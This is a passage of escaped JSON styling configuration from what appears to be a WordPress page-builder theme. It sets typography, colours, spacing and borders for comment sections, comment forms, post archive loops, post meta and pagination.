Sans\",\"size\":{\"unit\":\"em\",\"value\":\"1.25\"}}},\"commentInfo\":{\"typography\":{\"decoration\":\"none\",\"color\":\"${theme.colors.5|variant1}\",\"size\":{\"unit\":\"px\",\"value\":\"14\"}},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.5}\"}}},\"background\":{\"color\":\"\"},\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}},\"transition\":{\"duration\":{\"value\":\"0.5\"}}},\"commentText\":{\"typography\":{\"decoration\":\"none\",\"color\":\"${theme.colors.5|variant2}\",\"size\":{\"unit\":\"px\",\"value\":\"16\"},\"holders\":{\"p\":{\"color\":\"${theme.colors.5|variant2}\"},\"a\":{\"states\":{\"hover\":{\"color\":\"${theme.colors.0|variant3}\"}}}}}},\"commentAuthorName\":{\"typography\":{\"color\":\"${theme.colors.5|variant3}\",\"decoration\":\"none\",\"style\":\"normal\",\"weight\":\"600\"},\"background\":{\"color\":\"\"},\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"5\",\"unit\":\"px\"}}},\"disabledComments\":{\"typography\":{\"decoration\":\"none\",\"color\":\"${theme.colors.5|variant2}\"}},\"comment\":{\"background\":{\"color\":\"${theme.colors.4}\"},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}}},\"padding\":{\"top\":{\"value\":\"12\",\"unit\":\"px\"},\"right\":{\"value\":\"12\",\"unit\":\"px\"},\"bottom\":{\"value\":\"12\",\"unit\":\"px\"},\"left\":{\"value\":\"12\",\"unit\":\"px\"}}},\"commentAvatar\":{\"width\":{\"value\":30},\"height\":{\"value\":30},\"background\":{\"color\":\"\"},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}}}},\"commentsContainer\":{\"border\":{\"top\":{\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(238, 238, 238)\"},\"right\":{\"style\":\"solid\",\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"color\":\"rgb(238, 238, 238)\"},\"bottom\":{\"style\":\"solid\",\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"color\":\"rgb(238, 238, 238)\"},\"left\":{\"style\":\"solid\",\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"color\":\"rgb(238, 238, 238)\"}},\"padding\":{\"top\":{\"value\":\"15\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}}},\"commentReply\":{\"typography\":{\"color\":\"${theme.colors.0}\",\"size\":{\"unit\":\"em\",\"value\":\"1\"},\"transform\":\"lowercase\",\"weight\":\"400\",\"lineHeight\":{\"unit\":\"\",\"value\":\"1.5\"}},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0|variant3}\"}}}},\"alternateComment\":{\"background\":{\"color\":\"rgba(166, 220, 244, 0.1)\"},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}}},\"padding\":{\"top\":{\"value\":\"12\",\"unit\":\"px\"},\"right\":{\"value\":\"12\",\"unit\":\"px\"},\"bottom\":{\"value\":\"12\",\"unit\":\"px\"},\"left\":{\"value\":\"12\",\"unit\":\"px\"}}},\"commentReplies\":{\"margin\":{\"left\":{\"value\":\"12\"}}},\"commentInfoContainer\":{\"typography\":{\"color\":\"${theme.colors.4|variant2}\"},\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"16\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}}}}}},{\"id\":102,\"type\":\"hop-post-comment-form\",\"nodeId\":\"23-m32\",\"v\":\"1.1\",\"nodes\":[\"432-m33\",\"31-m33\"],\"style\":{\"descendants\":{\"commentFormTitle\":{\"typography\":{\"color\":\"${theme.colors.5}\",\"size\":{\"unit\":\"em\",\"value\":\"1.25\"},\"weight\":\"600\",\"family\":\"Open Sans\"}},\"commentFormLabels\":{\"typography\":{\"color\":\"${theme.colors.5|variant2}\"},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"}}}}},\"commentFormButton\":{\"background\":{\"color\":\"${theme.colors.0}\"},\"states\":{\"hover\":{\"background\":{\"color\":\"${theme.colors.0|variant3}\"},\"border\":{\"top\":{\"color\":\"${theme.colors.0|variant3}\"},\"bottom\":{\"color\":\"${theme.colors.0|variant3}\"},\"right\":{\"color\":\"${theme.colors.0|variant3}\"},\"left\":{\"color\":\"${theme.colors.0|variant3}\"}}}},\"border\":{\"top\":{\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"color\":\"${theme.colors.0}\",\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}},\"right\":{\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"color\":\"${theme.colors.0}\"},\"bottom\":{\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"color\":\"${theme.colors.0}\",\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}},\"left\":{\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"color\":\"${theme.colors.0}\"}},\"padding\":{\"top\":{\"value\":\"12\",\"unit\":\"px\"},\"right\":{\"value\":\"24\",\"unit\":\"px\"},\"bottom\":{\"value\":\"12\",\"unit\":\"px\"},\"left\":{\"value\":\"24\",\"unit\":\"px\"}},\"typography\":{\"color\":\"${theme.colors.4}\",\"size\":{\"unit\":\"px\",\"value\":\"12\"},\"weight\":\"600\",\"family\":\"Open Sans\",\"transform\":\"uppercase\",\"lineHeight\":{\"unit\":\"\",\"value\":\"1\"},\"letterSpacing\":{\"unit\":\"px\",\"value\":\"1\"}}},\"commentFormInputs\":{\"border\":{\"top\":{\"color\":\"rgb(238, 238, 238)\",\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}},\"right\":{\"color\":\"rgb(238, 238, 238)\"},\"left\":{\"color\":\"rgb(238, 238, 238)\"},\"bottom\":{\"color\":\"rgb(238, 238, 238)\",\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}}},\"typography\":{\"weight\":\"400\",\"family\":\"Open Sans\",\"size\":{\"unit\":\"px\",\"value\":\"16\"},\"color\":\"${theme.colors.5|variant2}\"},\"background\":{\"color\":\"rgba(0,0,0,0)\"},\"padding\":{\"top\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"},\"bottom\":{\"value\":\"5\",\"unit\":\"px\"},\"left\":{\"value\":\"5\",\"unit\":\"px\"}}},\"commentFormNotes\":{\"typography\":{\"color\":\"${theme.colors.5|variant1}\",\"weight\":\"400\",\"family\":\"Open Sans\",\"size\":{\"unit\":\"px\",\"value\":\"14\"}}}},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"}},\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(238, 238, 238)\"},\"bottom\":{\"radius\":{\"left\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"}},\"style\":\"solid\",\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"color\":\"rgb(238, 238, 238)\"},\"right\":{\"style\":\"solid\",\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"color\":\"rgb(238, 238, 238)\"},\"left\":{\"style\":\"solid\",\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"color\":\"rgb(238, 238, 238)\"}},\"padding\":{\"top\":{\"value\":\"15\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}}}},{\"id\":103,\"type\":\"hop-main\",\"nodeId\":\"68-m1\",\"v\":\"1.1\",\"nodes\":[\"435-m1\",\"34-m1\"],\"style\":{\"margin\":{\"top\":{\"value\":\"-30\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}},\"media\":{\"tablet\":{\"margin\":{\"top\":{\"value\":\"-15\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}}}}}},{\"id\":104,\"type\":\"hop-section\",\"nodeId\":\"19-m36\",\"nodes\":[\"435-m2\",\"34-m2\"],\"style\":{\"padding\":{\"top\":{\"value\":\"0\"},\"bottom\":{\"value\":\"0\"}}},\"v\":\"1.1\"},{\"id\":105,\"props\":{\"layout\":{\"equalWidth\":false}},\"type\":\"hop-row\",\"nodeId\":\"19-m40\",\"nodes\":[\"435-m25\",\"34-m25\"],\"v\":\"1.1\"},{\"id\":106,\"type\":\"hop-column\",\"nodeId\":\"19-m41\",\"nodes\":[\"435-m26\",\"34-m26\"],\"v\":\"1.1\"},{\"id\":107,\"props\":{\"headerType\":\"2\"},\"type\":\"hop-heading\",\"nodeId\":\"19-m42\",\"nodes\":[\"435-m27\",\"34-m27\"],\"v\":\"1.1\"},{\"id\":108,\"type\":\"hop-text\",\"nodeId\":\"19-m43\",\"nodes\":[\"435-m28\",\"34-m28\"],\"v\":\"1.1\"},{\"id\":109,\"type\":\"hop-archive-loop\",\"nodeId\":\"26-m6\",\"props\":{\"layout\":{\"horizontalGap\":3,\"verticalGap\":3,\"horizontalInnerGap\":0,\"verticalInnerGap\":0,\"itemsPerRow\":2,\"horizontalAlign\":\"start\",\"custom\":{\"horizontalInnerGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalInnerGap\":{\"unit\":\"px\",\"value\":\"\"},\"horizontalGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalGap\":{\"unit\":\"px\",\"value\":\"\"}}},\"media\":{\"tablet\":{\"layout\":{\"itemsPerRow\":1,\"horizontalGap\":2,\"verticalGap\":2}},\"mobile\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":0,\"horizontalGap\":2}}},\"showMasonry\":true},\"v\":\"1.1\",\"nodes\":[\"435-m3\",\"34-m3\"]},{\"id\":110,\"type\":\"hop-loop-item\",\"nodeId\":\"26-m7\",\"style\":{\"background\":{\"color\":\"${theme.colors.4}\"},\"boxShadow\":{\"enabled\":true,\"layers\":[{\"color\":\"rgba(1, 51, 74, 0.15)\",\"spread\":\"0\",\"y\":\"10\",\"blur\":\"40\"}]},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}}}},\"v\":\"1.1\",\"nodes\":[\"435-m4\",\"34-m4\"],\"props\":{\"attrs\":{\"overflowOption\":\"hidden\"}}},{\"id\":111,\"type\":\"hop-post-thumbnail\",\"nodeId\":\"26-m19\",\"style\":{\"margin\":{\"top\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"bottom\":{\"value\":\"0\",\"unit\":\"px\"},\"left\":{\"unit\":\"px\"}},\"background\":{\"color\":\"rgba(255,255,255,0)\"}},\"v\":\"1.1\",\"nodes\":[\"435-m5\",\"34-m5\"]},{\"id\":112,\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":3,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0,\"custom\":{\"horizontalGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalGap\":{\"unit\":\"px\",\"value\":\"\"},\"horizontalInnerGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalInnerGap\":{\"unit\":\"px\",\"value\":\"\"}}},\"media\":{\"tablet\":{\"layout\":{\"horizontalInnerGap\":3,\"verticalInnerGap\":3,\"horizontalGap\":3,\"verticalGap\":0,\"custom\":{\"verticalGap\":{\"unit\":\"px\",\"value\":\"\"}}}},\"mobile\":{\"layout\":{\"horizontalGap\":3,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0,\"custom\":{\"verticalGap\":{\"unit\":\"px\",\"value\":\"\"}}}}}},\"type\":\"hop-row\",\"nodeId\":\"1726-m24\",\"v\":\"1.1\",\"nodes\":[\"435-m6\",\"34-m6\"],\"style\":{\"margin\":{\"top\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"bottom\":{\"value\":\"0\",\"unit\":\"px\"},\"left\":{\"unit\":\"px\"}}}},{\"id\":113,\"type\":\"hop-column\",\"nodeId\":\"1726-m25\",\"style\":{\"textAlign\":\"left\",\"border\":{\"top\":{\"style\":\"solid\",\"color\":\"rgb(238, 238, 238)\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"right\":{\"style\":\"solid\",\"color\":\"rgb(238, 238, 238)\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"bottom\":{\"style\":\"solid\",\"color\":\"rgb(238, 238, 238)\",\"width\":{\"value\":\"1\",\"unit\":\"px\"}},\"left\":{\"style\":\"solid\",\"color\":\"rgb(238, 238, 238)\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}}},\"descendants\":{\"outer\":{\"media\":{\"mobile\":{\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"}}}}}},\"media\":{\"mobile\":{\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"}},\"textAlign\":\"center\"}},\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"}}},\"v\":\"1.1\",\"nodes\":[\"435-m7\",\"34-m7\"],\"props\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":3,\"vSpace\":{\"value\":\"10\"}},\"media\":{\"mobile\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":3}}}}},{\"id\":114,\"type\":\"hop-post-meta\",\"nodeId\":\"1706-c23\",\"style\":{\"descendants\":{\"icons\":{\"display\":\"none\",\"height\":{\"value\":\"18\"},\"width\":{\"value\":\"18\"},\"margin\":{\"right\":{\"value\":\"5\"}}},\"metaDataLinks\":{\"typography\":{\"decoration\":\"none\",\"color\":\"${theme.colors.5|variant1}\",\"size\":{\"unit\":\"px\",\"value\":\"14\"}},\"states\":{\"hover\":{\"typography\":{\"color\":\"rgb(0, 0, 0)\"}}}},\"metaDataPrefix\":{\"typography\":{\"color\":\"${theme.colors.5|variant2}\",\"size\":{\"unit\":\"px\",\"value\":\"14\"}}},\"metaDataSuffix\":{\"typography\":{\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"color\":\"${theme.colors.5|variant2}\"}}},\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"0\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}}},\"v\":\"1.1\",\"nodes\":[\"435-m8\",\"34-m8\"]},{\"id\":115,\"type\":\"hop-post-meta\",\"nodeId\":\"19-m9\",\"style\":{\"descendants\":{\"icons\":{\"display\":\"none\",\"height\":{\"value\":\"18\"},\"width\":{\"value\":\"18\"},\"margin\":{\"right\":{\"value\":\"5\"}}},\"metaDataLinks\":{\"typography\":{\"decoration\":\"none\",\"color\":\"${theme.colors.5|variant1}\",\"size\":{\"unit\":\"px\",\"value\":\"14\"}},\"states\":{\"hover\":{\"typography\":{\"color\":\"rgb(0, 0, 0)\"}}}},\"metaDataPrefix\":{\"typography\":{\"color\":\"${theme.colors.5|variant2}\",\"size\":{\"unit\":\"px\",\"value\":\"14\"}}},\"metaDataSuffix\":{\"typography\":{\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"color\":\"${theme.colors.5|variant2}\"}}}},\"v\":\"1.1\",\"nodes\":[\"435-m9\",\"34-m9\"]},{\"id\":116,\"type\":\"hop-post-title\",\"nodeId\":\"26-m10\",\"style\":{\"descendants\":{\"title\":{\"transition\":{\"duration\":{\"value\":\"0.5\"}}}}},\"v\":\"1.1\",\"nodes\":[\"435-m10\",\"34-m10\"]},{\"id\":117,\"type\":\"hop-post-excerpt\",\"nodeId\":\"26-m11\",\"style\":{\"descendants\":{\"excerpt\":{\"typography\":{\"color\":\"${theme.colors.5|variant2}\"}}}},\"v\":\"1.1\",\"nodes\":[\"435-m11\",\"34-m11\"]},{\"id\":118,\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0,\"equalHeight\":true,\"custom\":{\"horizontalGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalGap\":{\"unit\":\"px\",\"value\":\"\"},\"horizontalInnerGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalInnerGap\":{\"unit\":\"px\",\"value\":\"\"}}},\"media\":{\"mobile\":{\"layout\":{\"itemsPerRow\":2,\"horizontalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0,\"verticalGap\":0}}}},\"type\":\"hop-row\",\"nodeId\":\"1706-c20\",\"v\":\"1.1\",\"nodes\":[\"435-m12\",\"34-m12\"]},{\"id\":119,\"type\":\"hop-column\",\"nodeId\":\"1726-m20\",\"style\":{\"textAlign\":\"left\",\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"}},\"descendants\":{\"outer\":{\"media\":{\"mobile\":{\"padding\":{\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"},\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"}}}}}},\"media\":{\"mobile\":{\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"}}}}},\"props\":{\"verticalAlign\":\"center\",\"layout\":{\"horizontalInnerGap\":3,\"verticalInnerGap\":2,\"vSpace\":{\"value\":\"10\"}},\"media\":{\"mobile\":{\"layout\":{\"horizontalInnerGap\":3}}}},\"v\":\"1.1\",\"nodes\":[\"435-m13\",\"34-m13\"]},{\"id\":120,\"type\":\"hop-post-meta\",\"nodeId\":\"19-m25\",\"nodes\":[\"435-m14\",\"34-m14\"],\"v\":\"1.1\",\"style\":{\"descendants\":{\"metaDataLinks\":{\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0|variant3}\"}}},\"typography\":{\"color\":\"${theme.colors.0}\",\"decoration\":\"none\"}},\"icons\":{\"display\":\"inline-block\",\"height\":{\"value\":\"24\"},\"width\":{\"value\":\"24\"},\"margin\":{\"right\":{\"value\":\"5\"}}}}}},{\"id\":121,\"type\":\"hop-column\",\"nodeId\":\"1726-m21\",\"style\":{\"textAlign\":\"right\",\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"}},\"descendants\":{\"outer\":{\"media\":{\"mobile\":{\"padding\":{\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"},\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"}}}}}},\"media\":{\"mobile\":{\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"}}}}},\"props\":{\"verticalAlign\":\"center\",\"layout\":{\"horizontalInnerGap\":3,\"verticalInnerGap\":2,\"vSpace\":{\"value\":\"10\"}},\"media\":{\"mobile\":{\"layout\":{\"horizontalInnerGap\":3}}}},\"v\":\"1.1\",\"nodes\":[\"435-m15\",\"34-m15\"]},{\"id\":122,\"type\":\"hop-post-read-more-group\",\"nodeId\":\"19-m32\",\"nodes\":[\"435-m16\",\"34-m16\"],\"v\":\"1.1\"},{\"id\":123,\"type\":\"hop-post-read-more\",\"nodeId\":\"19-m33\",\"nodes\":[\"435-m17\",\"34-m17\"],\"v\":\"1.1\",\"style\":{\"textAlign\":\"center\",\"typography\":{\"color\":\"${theme.colors.0}\",\"family\":\"Open Sans\",\"margin\":{\"top\":\"\",\"bottom\":\"2rem\"},\"size\":{\"unit\":\"px\",\"value\":\"16\"},\"weight\":\"400\",\"lineHeight\":{\"value\":\"1.6\",\"unit\":\"\"},\"letterSpacing\":{\"value\":\"\",\"unit\":\"px\"}},\"border\":{\"top\":{\"style\":\"none\",\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"radius\":{\"right\":{\"value\":5,\"unit\":\"px\"},\"left\":{\"value\":5,\"unit\":\"px\"}}},\"bottom\":{\"style\":\"none\",\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"radius\":{\"right\":{\"value\":5,\"unit\":\"px\"},\"left\":{\"value\":5,\"unit\":\"px\"}}},\"right\":{\"style\":\"none\",\"width\":{\"value\":\"2\",\"unit\":\"px\"}},\"left\":{\"style\":\"none\",\"width\":{\"value\":\"2\",\"unit\":\"px\"}}},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0|variant3}\"}}},\"descendants\":{\"icon\":{\"size\":{\"unit\":\"px\",\"value\":\"16\"},\"margin\":{\"left\":{\"value\":\"5\",\"unit\":\"px\",\"path\":\"value\"},\"right\":{\"value\":0,\"unit\":\"px\"}}}}},\"props\":{\"showIcon\":true,\"iconPosition\":\"after\"}},{\"id\":124,\"props\":{\"layout\":{\"equalWidth\":false,\"custom\":{\"horizontalGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalGap\":{\"unit\":\"px\",\"value\":\"\"},\"horizontalInnerGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalInnerGap\":{\"unit\":\"px\",\"value\":\"\"}},\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0,\"horizontalAlign\":\"end\"},\"media\":{\"mobile\":{\"layout\":{\"horizontalAlign\":\"center\"}}}},\"type\":\"hop-post-nav-container\",\"nodeId\":\"19-m36\",\"nodes\":[\"435-m18\",\"34-m18\"],\"v\":\"1.1\",\"style\":{\"border\":{\"top\":{\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(224, 224, 224)\"},\"right\":{\"style\":\"solid\",\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"color\":\"rgb(224, 224, 224)\"},\"bottom\":{\"style\":\"solid\",\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"color\":\"rgb(224, 224, 224)\"},\"left\":{\"style\":\"solid\",\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"color\":\"rgb(224, 224, 224)\"}},\"margin\":{\"top\":{\"value\":\"45\",\"unit\":\"px\"},\"right\":{\"value\":\"30\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"30\",\"unit\":\"px\"}},\"media\":{\"tablet\":{\"margin\":{\"top\":{\"value\":\"45\",\"unit\":\"px\"},\"right\":{\"value\":\"10\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"10\",\"unit\":\"px\"}}},\"mobile\":{\"margin\":{\"top\":{\"value\":\"45\",\"unit\":\"px\"},\"right\":{\"value\":\"10\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"10\",\"unit\":\"px\"}}}}}},{\"id\":125,\"type\":\"hop-column\",\"nodeId\":\"19-m37\",\"nodes\":[\"435-m19\",\"34-m19\"],\"v\":\"1.1\",\"style\":{\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"15\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"}}},\"props\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":2}}},{\"id\":126,\"type\":\"hop-archive-nav-button\",\"nodeId\":\"26-m20\",\"v\":\"1.1\",\"nodes\":[\"435-m20\",\"34-m20\"],\"style\":{\"descendants\":{\"paginationNavigationButton\":{\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0}\"}}},\"typography\":{\"decoration\":\"none\",\"color\":\"${theme.colors.5|variant3}\"},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":0},\"right\":{\"value\":0}}},\"bottom\":{\"radius\":{\"left\":{\"value\":0},\"right\":{\"value\":0}}}}}}}},{\"id\":127,\"type\":\"hop-column\",\"nodeId\":\"19-m39\",\"nodes\":[\"435-m21\",\"34-m21\"],\"v\":\"1.1\",\"style\":{\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"}}},\"props\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":2}}},{\"id\":128,\"type\":\"hop-archive-pagination\",\"nodeId\":\"26-m14\",\"style\":{\"descendants\":{\"paginationNumbers\":{\"typography\":{\"color\":\"${theme.colors.5|variant3}\"},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0}\"}}}},\"paginationActiveNumber\":{\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0}\"}}},\"typography\":{\"color\":\"${theme.colors.0}\"}}}},\"v\":\"1.1\",\"nodes\":[\"435-m22\",\"34-m22\"]},{\"id\":129,\"type\":\"hop-column\",\"nodeId\":\"19-m38\",\"nodes\":[\"435-m23\",\"34-m23\"],\"v\":\"1.1\",\"style\":{\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"15\"},\"right\":{\"unit\":\"px\",\"value\":\"\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"}}},\"props\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":2}}},{\"id\":130,\"type\":\"hop-archive-nav-button\",\"nodeId\":\"26-m21\",\"style\":{\"descendants\":{\"paginationNavigationButton\":{\"border\":{\"bottom\":{\"color\":\"${theme.colors.5}\",\"radius\":{\"left\":{\"value\":0},\"right\":{\"value\":0}}},\"top\":{\"color\":\"${theme.colors.5}\",\"radius\":{\"left\":{\"value\":0},\"right\":{\"value\":0}}},\"left\":{\"color\":\"${theme.colors.5}\"},\"right\":{\"color\":\"${theme.colors.5}\"}},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0}\"}}},\"typography\":{\"color\":\"${theme.colors.5|variant3}\",\"decoration\":\"none\"}}}},\"v\":\"1.1\",\"nodes\":[\"435-m24\",\"34-m24\"]},{\"id\":131,\"type\":\"hop-main\",\"nodeId\":\"35-m1\",\"v\":\"1.1\",\"nodes\":[\"636-m1\",\"37-m1\"]},{\"id\":132,\"type\":\"hop-row\",\"nodeId\":\"1735-m2\",\"props\":{\"layout\":{\"itemsPerRow\":2,\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"v\":\"1.1\",\"nodes\":[\"636-m2\",\"37-m2\"]},{\"id\":133,\"type\":\"hop-column\",\"nodeId\":\"35-m3\",\"style\":{\"descendants\":{\"outer\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\